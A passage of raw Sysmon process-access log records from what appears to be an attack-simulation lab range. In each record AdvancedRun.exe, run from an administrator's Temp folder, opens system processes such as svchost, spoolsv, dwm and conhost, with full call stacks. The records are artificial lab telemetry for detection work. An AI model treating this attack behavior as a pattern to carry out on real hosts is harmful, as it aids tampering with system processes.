un.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004068987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
